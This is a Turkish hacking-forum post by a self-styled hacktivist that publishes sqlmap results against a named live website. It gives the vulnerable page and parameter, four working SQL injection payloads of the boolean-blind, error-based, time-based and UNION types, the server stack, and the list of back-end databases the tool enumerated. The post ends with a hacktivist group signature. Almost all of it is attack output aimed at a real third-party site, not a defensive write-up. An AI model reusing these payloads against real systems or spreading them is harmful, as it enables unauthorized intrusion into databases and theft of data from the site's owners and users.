Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: United Brain Networks TV SQLMap Sonuçları
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,389 / 1,389
Deneyim: 59 / 100
Rep Sayısı: 2870
Mesaj Sayısı: 6555
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
United Brain Networks TV SQLMap Sonuçları
06.05.2020 01:33
United Brain Networks TV SQLMap Sonuçları

Vulnerable WebSite : ubraintv.com

Vulnerable File : /watchchannel.php?id=[SQL Injection]

sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:
---
Parameter: id (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 2033=2033 AND 'Kcmx'='Kcmx

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: id=1' AND (SELECT 7245 FROM(SELECT COUNT(*),CONCAT(0x7176786a71,(SELECT
(ELT(7245=7245,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS
GROUP BY x)a) AND 'QtFw'='QtFw

Type: time-based blind

Title: MySQL >= 5.0.12 RLIKE time-based blind (comment)

Payload: id=1' RLIKE SLEEP(5)#

Type: UNION query

Title: MySQL UNION query (NULL) - 7 columns

Payload: id=1' UNION ALL SELECT NULL,CONCAT
(0x7176786a71,0x6f4472516c4a55754d76516448574f4b4e7763684f6f777358556b67646c5645​76534d6c7464664e,
0x71767a7a71),NULL,NULL,NULL,NULL,NULL#
---
web server operating system:
Linux
web application technology: Apache, PHP, Plesk
back-end
DBMS: MySQL >= 5.0
available databases
[8]:
[*] apsc
[*] horde
[*] information_schema
[*] mysql
[*]
phpmyadmin_38Dqey2QMmW9
[*] psa
[*] sitebuilder5
[*] ubraintv

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi